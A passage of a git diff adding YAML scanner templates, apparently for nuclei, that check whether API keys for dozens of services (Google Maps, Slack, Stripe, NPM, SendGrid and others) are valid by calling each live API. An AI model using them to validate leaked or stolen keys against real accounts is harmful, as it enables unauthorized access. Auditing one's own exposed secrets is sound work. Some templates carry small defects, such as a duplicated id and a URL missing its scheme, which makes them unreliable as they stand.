(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/googlemapsembedadvanced.yaml b/apis/googlemapsembedadvanced.yaml new file mode 100644 index 0000000000..68247530a1 --- /dev/null +++ b/apis/googlemapsembedadvanced.yaml @@ -0,0 +1,21 @@ +id: api-googlemapsembedadvanced + +info: + name: Google Maps Embed (Advanced) API Test + author: zzeitlin + severity: info + tags: api,google,maps,embed + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/googlenearbysearch.yaml b/apis/googlenearbysearch.yaml new file mode 100644 index 0000000000..3d4ce04ff3 --- /dev/null +++ b/apis/googlenearbysearch.yaml @@ -0,0 +1,23 @@ +id: api-googlenearbysearch + +info: + name: Google Nearby Search API Test + author: zzeitlin + severity: info + tags: api,google,search,nearby + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googlenearestroads.yaml b/apis/googlenearestroads.yaml new file mode 100644 index 0000000000..aed30d37b7 --- /dev/null +++ b/apis/googlenearestroads.yaml @@ -0,0 +1,23 @@ +id: api-googlenearestroads + +info: + name: Google Nearest Roads API Test + author: zzeitlin + severity: info + tags: api,google,roads + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/googleplacedetails.yaml b/apis/googleplacedetails.yaml new file mode 100644 index 0000000000..2cc17c9d83 --- /dev/null +++ b/apis/googleplacedetails.yaml @@ -0,0 +1,23 @@ +id: api-googlespeedlimit + +info: + name: Google Place Details API Test + author: zzeitlin + severity: info + tags: api,google,place,details + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googleplacesphoto.yaml b/apis/googleplacesphoto.yaml new file mode 100644 index 0000000000..fb18b2eb74 --- /dev/null +++ b/apis/googleplacesphoto.yaml @@ -0,0 +1,21 @@ +id: api-googleplacesphoto + +info: + name: Google Places Photo API Test + author: zzeitlin + severity: info + tags: api,google,places,photo + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 302 diff --git a/apis/googleplayablelocations.yaml b/apis/googleplayablelocations.yaml new file mode 100644 index 0000000000..0cbb4b74cd --- /dev/null +++ b/apis/googleplayablelocations.yaml @@ -0,0 +1,23 @@ +id: api-googleplayablelocations + +info: + name: Google Playable Locations API Test + author: zzeitlin + severity: info + tags: api,google,playable,locations + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/googleroutetotraveled.yaml b/apis/googleroutetotraveled.yaml new file mode 100644 index 0000000000..26b36b1d14 --- /dev/null +++ b/apis/googleroutetotraveled.yaml @@ -0,0 +1,23 @@ +id: api-googleroutetotraveled + +info: + name: Google Route to Traveled API Test + author: zzeitlin + severity: info + tags: api,google,route + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/googlespeedlimit.yaml b/apis/googlespeedlimit.yaml new file mode 100644 index 0000000000..baef0d8cc7 --- /dev/null +++ b/apis/googlespeedlimit.yaml @@ -0,0 +1,23 @@ +id: api-googlespeedlimit + +info: + name: Google Speed Limit API Test + author: zzeitlin + severity: info + tags: api,google,speed,limit + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/googlestaticmaps.yaml b/apis/googlestaticmaps.yaml new file mode 100644 index 0000000000..bf16e79c38 --- /dev/null +++ b/apis/googlestaticmaps.yaml @@ -0,0 +1,21 @@ +id: api-googlestaticmaps + +info: + name: Google Static Maps API Test + author: zzeitlin + severity: info + tags: api,google,maps + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/googlestreetview.yaml b/apis/googlestreetview.yaml new file mode 100644 index 0000000000..c70fbee958 --- /dev/null +++ b/apis/googlestreetview.yaml @@ -0,0 +1,21 @@ +id: api-googlestreetview + +info: + name: Google Static Streetview API Test + author: zzeitlin + severity: info + tags: api,google,streetview + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/googletextsearchplaces.yaml b/apis/googletextsearchplaces.yaml new file mode 100644 index 0000000000..a174ebb13d --- /dev/null +++ b/apis/googletextsearchplaces.yaml @@ -0,0 +1,23 @@ +id: api-googletextsearchplaces + +info: + name: Google Places Text Search API Test + author: zzeitlin + severity: info + tags: api,google,search,places,text + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error_message' + negative: true diff --git a/apis/googletimezone.yaml b/apis/googletimezone.yaml new file mode 100644 index 0000000000..3aee14c868 --- /dev/null +++ b/apis/googletimezone.yaml @@ -0,0 +1,23 @@ +id: api-googletimezone + +info: + name: Google Timezone API Test + author: zzeitlin + severity: info + tags: api,google,timezone + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'errorMessage' + negative: true diff --git a/apis/heroku.yaml b/apis/heroku.yaml new file mode 100644 index 0000000000..aa2f7c8fd2 --- /dev/null +++ b/apis/heroku.yaml @@ -0,0 +1,28 @@ +id: api-heroku + +info: + name: Heroku API Test + author: zzeitlin + reference: https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api + severity: info + tags: api,heroku + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://api.heroku.com/apps" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Accept: application/vnd.heroku+json; version=3 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 200 + - 201 + - 202 + - 206 + condition: or diff --git a/apis/hubspot.yaml b/apis/hubspot.yaml new file mode 100644 index 0000000000..c0b48f939d --- /dev/null +++ b/apis/hubspot.yaml @@ -0,0 +1,25 @@ +id: api-hubspot + +info: + name: HubSpot API Test + author: zzeitlin + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners + severity: info + tags: api,hubspot + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/instagram.yaml b/apis/instagram.yaml new file mode 100644 index 0000000000..37b1c384cd --- /dev/null +++ b/apis/instagram.yaml @@ -0,0 +1,22 @@ +id: api-instagramgraph + +info: + name: Instagram Graph API Test + author: zzeitlin + reference: https://developers.facebook.com/docs/instagram-api/getting-started + severity: info + tags: api,instagram,graph + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/ipstack.yaml b/apis/ipstack.yaml new file mode 100644 index 0000000000..9e88a0ea29 --- /dev/null +++ b/apis/ipstack.yaml @@ -0,0 +1,24 @@ +id: api-ipstack + +info: + name: IPStack API Test + author: zzeitlin + reference: https://ipstack.com/documentation + severity: info + tags: api,ipstack + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_access_key' diff --git a/apis/iterable.yaml b/apis/iterable.yaml new file mode 100644 index 0000000000..731cae878e --- /dev/null +++ b/apis/iterable.yaml @@ -0,0 +1,25 @@ +id: api-iterable + +info: + name: Iterable API Test + author: zzeitlin + reference: https://api.iterable.com/api/docs + severity: info + tags: api,iterable + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Api_Key: "{{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'BadApiKey' diff --git a/apis/jumpcloud.yaml b/apis/jumpcloud.yaml new file mode 100644 index 0000000000..83d1762ea2 --- /dev/null +++ b/apis/jumpcloud.yaml @@ -0,0 +1,25 @@ +id: api-jumpcloud + +info: + name: JumpCloud API Test + author: zzeitlin + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key + severity: info + tags: api,jumpcloud + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://console.jumpcloud.com/api/systems" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + X-Api-Key: "{{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'Unauthorized' diff --git a/apis/lokalise.yaml b/apis/lokalise.yaml new file mode 100644 index 0000000000..e48e63e134 --- /dev/null +++ b/apis/lokalise.yaml @@ -0,0 +1,23 @@ +id: api-lokalise + +info: + name: Lokalise API Test + author: zzeitlin + reference: https://app.lokalise.com/api2docs/curl/#resource-projects + severity: info + tags: api,lokalise + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.lokalise.com/api2/projects/" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + X-Api-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/apis/loqate.yaml b/apis/loqate.yaml new file mode 100644 index 0000000000..d2680360a3 --- /dev/null +++ b/apis/loqate.yaml @@ -0,0 +1,24 @@ +id: api-loqate + +info: + name: Loqate API Test + author: zzeitlin + reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ + severity: info + tags: api,loqate + +requests: + - method: GET + payloads: + token: token.txt + path: + - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: word + part: body + negative: true + words: + - 'Unknown key' diff --git a/apis/mailchimp.yaml b/apis/mailchimp.yaml new file mode 100644 index 0000000000..0bf97594af --- /dev/null +++ b/apis/mailchimp.yaml @@ -0,0 +1,21 @@ +id: api-mailchimp + +info: + name: Mailchimp API Test + author: zzeitlin + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info + tags: api,mailchimp + +network: + - inputs: + - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" + read: 1024 + payloads: + token: token.txt + host: + - "tls://smtp.mandrillapp.com:465" + matchers: + - type: word + words: + - "success" diff --git a/apis/mailgun.yaml b/apis/mailgun.yaml new file mode 100644 index 0000000000..522c2bf958 --- /dev/null +++ b/apis/mailgun.yaml @@ -0,0 +1,23 @@ +id: api-mailgun + +info: + name: Mailgun API Test + author: zzeitlin + reference: https://documentation.mailgun.com/en/latest/api-intro.html + severity: info + tags: api,mailgun + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.mailgun.net/v3/domains" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Basic {{base64('api:' + token)}} + matchers: + - type: status + status: + - 200 diff --git a/apis/mapbox.yaml b/apis/mapbox.yaml new file mode 100644 index 0000000000..568cc4b92c --- /dev/null +++ b/apis/mapbox.yaml @@ -0,0 +1,23 @@ +id: api-mapbox + +info: + name: Mapbox API Test + author: zzeitlin + reference: https://docs.mapbox.com/api/search/geocoding/ + severity: info + tags: api,mapbox + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/nerdgraph.yaml b/apis/nerdgraph.yaml new file mode 100644 index 0000000000..d4ac8b067c --- /dev/null +++ b/apis/nerdgraph.yaml @@ -0,0 +1,27 @@ +id: api-nerdgraph + +info: + name: New Relic NerdGraph API Test + author: zzeitlin + reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ + severity: info + tags: api,newrelic,nerdgraph + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://api.newrelic.com/graphql" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Content-Type: application/json + API-Key: "{{token}}" + body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" + matchers: + - type: word + part: body + negative: true + words: + - 'errors' diff --git a/apis/npm.yaml b/apis/npm.yaml new file mode 100644 index 0000000000..f9637b9c5d --- /dev/null +++ b/apis/npm.yaml @@ -0,0 +1,25 @@ +id: api-npm + +info: + name: NPM API Test + author: zzeitlin + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + severity: info + tags: api,node,npm,package,manager + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://registry.npmjs.org/-/whoami" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + - 403 + negative: true diff --git a/apis/openweather.yaml b/apis/openweather.yaml new file mode 100644 index 0000000000..f92082e718 --- /dev/null +++ b/apis/openweather.yaml @@ -0,0 +1,22 @@ +id: api-openweather + +info: + name: OpenWeather API Test + author: zzeitlin + reference: https://openweathermap.org/current + severity: info + tags: api,weather,openweather + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 200 diff --git a/apis/pagerduty.yaml b/apis/pagerduty.yaml new file mode 100644 index 0000000000..990cf6b468 --- /dev/null +++ b/apis/pagerduty.yaml @@ -0,0 +1,25 @@ +id: api-pagerduty + +info: + name: Pagerduty API Test + author: zzeitlin + reference: https://developer.pagerduty.com/api-reference + severity: info + tags: api,pagerduty + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.pagerduty.com/schedules" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Accept: application/vnd.pagerduty+json;version=2 + Authorization: Token token={{token}} + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/pendo.yaml b/apis/pendo.yaml new file mode 100644 index 0000000000..7bea14f9a6 --- /dev/null +++ b/apis/pendo.yaml @@ -0,0 +1,27 @@ +id: api-pendo + +info: + name: Pendo API Test + author: zzeitlin + reference: https://help.pendo.io/resources/support-library/api/index.html + severity: info + tags: api,pendo + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://app.pendo.io/api/v1/feature" + - "https://app.pendo.io/api/v1/metadata/schema/account" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Content-Type: application/json + X-Pendo-Integration-Key: "{{token}}" + matchers: + - type: status + status: + - 403 + negative: true + diff --git a/apis/pivotaltracker.yaml b/apis/pivotaltracker.yaml new file mode 100644 index 0000000000..bab9aecbf2 --- /dev/null +++ b/apis/pivotaltracker.yaml @@ -0,0 +1,25 @@ +id: api-pivotaltracker + +info: + name: PivotalTracker API Test + author: zzeitlin + reference: https://www.pivotaltracker.com/help/api + severity: info + tags: api,pivotaltracker + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://www.pivotaltracker.com/services/v5/me" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + X-TrackerToken: "{{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_authentication' diff --git a/apis/postmark.yaml b/apis/postmark.yaml new file mode 100644 index 0000000000..1acdc4d978 --- /dev/null +++ b/apis/postmark.yaml @@ -0,0 +1,24 @@ +id: api-postmark + +info: + name: PostMark API Test + author: zzeitlin + reference: https://postmarkapp.com/developer/api/overview + severity: info + tags: api,postmark + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.postmarkapp.com/stats/outbound" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Accept: application/json + X-Postmark-Server-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/apis/sendgrid.yaml b/apis/sendgrid.yaml new file mode 100644 index 0000000000..f8fba977d6 --- /dev/null +++ b/apis/sendgrid.yaml @@ -0,0 +1,23 @@ +id: api-sendgrid + +info: + name: Sendgrid API Test + author: zzeitlin + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp + severity: info + tags: api,sendgrid + +network: + - inputs: + - data: "ehlo\r\n" + read: 1024 + - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" + read: 1024 + payloads: + token: token.txt + host: + - "tls://smtp.sendgrid.net:465" + matchers: + - type: word + words: + - "Authentication successful" diff --git a/apis/slack.yaml b/apis/slack.yaml new file mode 100644 index 0000000000..7f4413fa00 --- /dev/null +++ b/apis/slack.yaml @@ -0,0 +1,25 @@ +id: api-slack + +info: + name: Slack API Test + author: zzeitlin + reference: https://api.slack.com/methods/auth.test + severity: info + tags: api,slack + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://slack.com/api/auth.test" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/sonarcloud.yaml b/apis/sonarcloud.yaml new file mode 100644 index 0000000000..a298ad7fb7 --- /dev/null +++ b/apis/sonarcloud.yaml @@ -0,0 +1,24 @@ +id: api-sonarcloud + +info: + name: SonarCloud API Test + author: zzeitlin + reference: https://sonarcloud.io/web_api/api/authentication + severity: info + tags: api,sonarcloud + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://sonarcloud.io/api/authentication/validate" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Basic {{base64(token + ':')}} + matchers: + - type: word + part: body + words: + - 'true' diff --git a/apis/spotify.yaml b/apis/spotify.yaml new file mode 100644 index 0000000000..88edd113aa --- /dev/null +++ b/apis/spotify.yaml @@ -0,0 +1,23 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + severity: info + tags: api,spotify + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.spotify.com/v1/me" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 200 diff --git a/apis/square.yaml b/apis/square.yaml new file mode 100644 index 0000000000..58322efd06 --- /dev/null +++ b/apis/square.yaml @@ -0,0 +1,27 @@ +id: api-square + +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: api,square + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/apis/stripe.yaml b/apis/stripe.yaml new file mode 100644 index 0000000000..67435be918 --- /dev/null +++ b/apis/stripe.yaml @@ -0,0 +1,23 @@ +id: api-stripe + +info: + name: Stripe API Test + author: zzeitlin + reference: https://stripe.com/docs/api/authentication + severity: info + tags: api,stripe + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.stripe.com/v1/charges" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Basic {{base64(token + ':')}} + matchers: + - type: status + status: + - 200 diff --git a/apis/tinypng.yaml b/apis/tinypng.yaml new file mode 100644 index 0000000000..6711eab16a --- /dev/null +++ b/apis/tinypng.yaml @@ -0,0 +1,26 @@ +id: api-tinypng + +info: + name: TinyPNG API Test + author: zzeitlin + reference: https://tinypng.com/developers + severity: info + tags: api,tinypng + +requests: + - method: POST + payloads: + token: token.txt + path: + - "https://api.tinify.com/shrink" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Basic {{base64('api:' + token)}} + matchers: + - type: word + part: header + words: + - 'Compression-Count' + - 'compression-count' + condition: or diff --git a/apis/token.txt b/apis/token.txt new file mode 100644 index 0000000000..3b8fcea50b --- /dev/null +++ b/apis/token.txt @@ -0,0 +1 @@ +exampleAPItokenhere diff --git a/apis/travisci.yaml b/apis/travisci.yaml new file mode 100644 index 0000000000..7d3d39fa33 --- /dev/null +++ b/apis/travisci.yaml @@ -0,0 +1,25 @@ +id: api-travisci + +info: + name: Travis CI API Test + author: zzeitlin + reference: https://developer.travis-ci.com/ + severity: info + tags: api,travis + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.travis-ci.com/user" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Travis-API-Version: 3 + Authorization: token {{token}} + matchers: + - type: status + status: + - 403 + negative: true diff --git a/apis/twitter.yaml b/apis/twitter.yaml new file mode 100644 index 0000000000..093ada5a49 --- /dev/null +++ b/apis/twitter.yaml @@ -0,0 +1,25 @@ +id: api-twitter + +info: + name: Twitter API Test + author: zzeitlin + refernce: https://developer.twitter.com/en/docs/twitter-api/api-reference-index + severity: info + tags: api,twitter + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'error' + negative: true diff --git a/apis/visualstudio.yaml b/apis/visualstudio.yaml new file mode 100644 index 0000000000..c5354310a1 --- /dev/null +++ b/apis/visualstudio.yaml @@ -0,0 +1,26 @@ +id: api-visualstudio + +info: + name: Visual Studio API Test + author: zzeitlin + reference: https://openapi.appcenter.ms/ + severity: info + tags: api,visualstudio,microsoft + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://api.appcenter.ms/v0.1/apps" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + Content-Type: application/json + X-Api-Token: "{{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'Unauthorized' diff --git a/apis/wakatime.yaml b/apis/wakatime.yaml new file mode 100644 index 0000000000..b1c8e0c71f --- /dev/null +++ b/apis/wakatime.yaml @@ -0,0 +1,23 @@ +id: api-wakatime + +info: + name: WakaTime CI API Test + author: zzeitlin + reference: https://wakatime.com/developers + severity: info + tags: api,wakatime + +requests: + - method: GET + payloads: + token: token.txt + path: + - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + redirects: false + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 + matchers: + - type: status + status: + - 401 + negative: true diff --git a/apis/weglot.yaml b/apis/weglot.yaml new file mode 100644 index 0000000000..1251c711d5 --- /dev/null +++ b/apis/weglot.yaml @@ -0,0 